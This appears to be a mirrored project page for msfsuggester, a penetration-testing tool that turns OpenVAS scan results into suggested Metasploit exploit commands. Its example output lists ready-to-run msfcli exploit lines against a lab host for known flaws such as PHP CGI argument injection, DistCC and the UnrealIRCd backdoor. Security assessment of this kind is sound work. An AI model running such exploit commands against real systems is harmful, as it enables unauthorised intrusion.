Git Product home page Git Product logo

msfsuggester's Introduction

Msfsuggester

Msfsuggester is a tool that parse OpenVAS XML output and suggest an exploit from metasploit with a msfcli command line.

Installation

$ git clone https://github.com/m0nad/msfsuggester
$ gem install nokogiri

Usage

ruby msfsuggester.rb openvas.xml /path/to/metasploit-framework/

Example:

$ ruby msfsuggester.rb OPENVAS_metasploitable.xml /home/monad/metasploit-framework/
== (GoodRanking) MySQL yaSSL CertDecoder::GetName Buffer Overflow ==
msfcli exploit/linux/mysql/mysql_yassl_getname RHOST=192.168.0.115 RPORT=3306 E
Refs: CVE:2009-4484 BID:37974

== (ExcellentRanking) PHP CGI Argument Injection ==
msfcli exploit/multi/http/php_cgi_arg_injection RHOST=192.168.0.115 RPORT=80 E
Refs: CVE:2012-1823

== (ExcellentRanking) DistCC Daemon Command Execution ==
msfcli exploit/unix/misc/distcc_exec RHOST=192.168.0.115 RPORT=3632 E
Refs: CVE:2004-2687

== (ExcellentRanking) UnrealIRCD 3.2.8.1 Backdoor Command Execution ==
msfcli exploit/unix/irc/unreal_ircd_3281_backdoor RHOST=192.168.0.115 RPORT=6667 E
Refs: CVE:2010-2075

== (Unknown) OpenSSL Server-Side ChangeCipherSpec Injection Scanner ==
msfcli auxiliary/scanner/ssl/openssl_ccs RHOSTS=192.168.0.115 RPORT=5432 E
Refs: CVE:2014-0224

== (Unknown) HTTP Options Detection ==
msfcli auxiliary/scanner/http/options RHOSTS=192.168.0.115 RPORT=80 E
Refs: CVE:2005-3498 BID:9561

== (Unknown) X11 No-Auth Scanner ==
msfcli auxiliary/scanner/x11/open_x11 RHOSTS=192.168.0.115 RPORT=6000 E
Refs: CVE:1999-0526

msfsuggester's People

Contributors

m0nad avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.